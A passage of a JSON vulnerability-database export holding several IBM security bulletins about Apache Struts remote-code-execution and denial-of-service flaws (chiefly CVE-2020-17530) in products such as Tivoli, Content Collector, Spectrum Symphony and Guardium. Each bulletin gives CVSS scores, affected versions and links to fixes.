"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:51:01", "description": "## Summary\n\nVulnerability in Apache Struts affects IBM Tivoli Application Dependency Discovery Manager (CVE-2020-17530).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Tivoli Application Dependency Discovery Manager| 7.3.0.7 - 7.3.0.8 \n \n## Remediation/Fixes\n\n**Fix**| **VRMF**| **APAR**| **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.26_FP8201126.zip| 7.3.0.7 - 7.3.0.8| None| [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=YSQ1wdrl2p5zUUGFQ8PqEQXZuGPl9v7OMZIWrZqmkfw> \"Download eFix\" ) \n \n**Note:** Please refer the \"How to install\" section of the efix_readme.txt while applying the above efix.\n\n## Workarounds and Mitigations\n\nThe eFix can be downloaded and applied directly on the applicable versions mentioned above.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T12:25:40", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Tivoli Application Dependency Discovery Manager (CVE-2020-17530)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-13T12:25:40", "id": 
"47A9526430C9C366FECCD6852CFBC71095166B7357B960378A8A4EBF55B1FBCC", "href": "https://www.ibm.com/support/pages/node/6406954", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:24", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Microsoft SharePoint| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:01:55", "type": "ibm", "title": "Security Bulletin: 
CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:01:55", "id": "BE38ED822E7AF0C00178B9F33546DB67627005E6481750CB7374811E7F5674AE", "href": "https://www.ibm.com/support/pages/node/6593789", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:20", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for File Systems| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| \n\nUse Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:00:32", "type": "ibm", "title": "Security Bulletin: 
CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:00:32", "id": "456B2EB80A04726EA1ABA567940D381A0E2976991206F33CA962674055ED3FD9", "href": "https://www.ibm.com/support/pages/node/6593787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:45:05", "description": "## Summary\n\nVulnerability exists in the Apache Struts framework version used by IBM Spectrum Symphony V7.2.1, and V7.2.0.2. Interim fixes that provide instructions on upgrading the Apache Struts framework to version 2.5.26 (which resolves the vulnerability) are available on IBM Fix Central. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Symphony| 7.2.1 \nIBM Spectrum Symphony| 7.2.0.2 \n \n## Remediation/Fixes\n\n**Products**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nIBM Spectrum Symphony| 7.2.1| P104109| [sym-7.2.1-build600149](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600149&includeSupersedes=0> \"sym-7.2.1-build600149\" ) \nIBM Spectrum Symphony| 7.2.0.2| P104092| [sym-7.2.0.2-build600148](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600148&includeSupersedes=0> \"sym-7.2.0.2-build600148\" ) \n \n \n\n\n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-19T09:21:51", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts framework affects IBM Spectrum Symphony", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-03-19T09:21:51", "id": "2728A54A733C1334AD5FF98B90433841FD176869AA41A20F157E87B17EAD4D49", "href": "https://www.ibm.com/support/pages/node/6434139", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:35:02", "description": "## Summary\n\nIBM Security Guardium has fixed these vulnerabilities.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-1971](<https://vulners.com/cve/CVE-2020-1971>) \n** DESCRIPTION: **OpenSSL is vulnerable to a denial of service, caused by a NULL pointer dereference. If the GENERAL_NAME_cmp function contain an EDIPARTYNAME, an attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192748](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192748>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Guardium| 10.5 \n \nIBM Security Guardium| 10.6 \nIBM Security Guardium| 11.0 \nIBM Security Guardium| 11.1 \n \nIBM Security Guardium| 11.2 \n \nIBM Security Guardium| 11.3 \n \n \n \n\n\n## Remediation/Fixes\n\nProduct| Versions| Fix \n---|---|--- \nIBM Security Guardium| 10.5 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p540_Bundle_Jun-08-2021&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p540_Bundle_Jun-08-2021&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 10.6 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p665_Bundle_Apr-07-2021&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p665_Bundle_Apr-07-2021&includeSupersedes=0&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=10.0&platform=All&function=fixId&fixids=SqlGuard_10.0p665_Bundle_Apr-07-2021&includeSupersedes=0&source=fc\" ) \nIBM Security Guardium| 11.0 \n| 
[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p35_Bundle_Mar-30-2021&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p35_Bundle_Mar-30-2021&includeSupersedes=0&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p35_Bundle_Mar-30-2021&includeSupersedes=0&source=fc\" ) \nIBM Security Guardium| 11.1 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p140_Bundle_May-24-2021&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p140_Bundle_May-24-2021&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.2 \n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p240_Bundle_May-10-2021&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p240_Bundle_May-10-2021&includeSupersedes=0&source=fc>) \nIBM Security Guardium| 11.3| 
[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p315_Bundle_May-21-2021&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&product=ibm/Information+Management/InfoSphere+Guardium&release=11.0&platform=All&function=fixId&fixids=SqlGuard_11.0p315_Bundle_May-21-2021&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T18:02:27", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities (CVE-2020-17530, CVE-2020-1971)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2020-1971"], "modified": "2021-06-22T18:02:27", "id": "E3347BCB529A35601F044748C20F62BDDA272E18F4F99AF1DC1EC2079BD36858", "href": "https://www.ibm.com/support/pages/node/6443719", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:45:00", 
"description": "## Summary\n\nFix is available for multiple vulnerabilities affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2021-20336, CVE-2020-17530).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-20336](<https://vulners.com/cve/CVE-2021-20336>) \n** DESCRIPTION: **IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. \nCVSS Base score: 6.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/194350](<https://exchange.xforce.ibmcloud.com/vulnerabilities/194350>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n## Remediation/Fixes\n\n**Product**| **CVE**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI \n| CVE-2021-20336| IJ30110| Apply [WebGUI 8.1.0 Fix Pack 22](<https://www.ibm.com/support/pages/node/6420367> \"WebGUI 8.1.0 Fix Pack 22\" ) \n \nCVE-2020-17530| IJ30067 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product.\n\n## Workarounds and Mitigations\n\nNone\n\n \n\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T13:06:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities is affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2021-20336, CVE-2020-17530)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-20336"], "modified": "2021-03-22T13:06:36", "id": "3FA2879FBADE8540F6B4D5091DA5772A30EB11207B58722F47A672ABFF7C289C", "href": 
"https://www.ibm.com/support/pages/node/6427953", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:22", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: 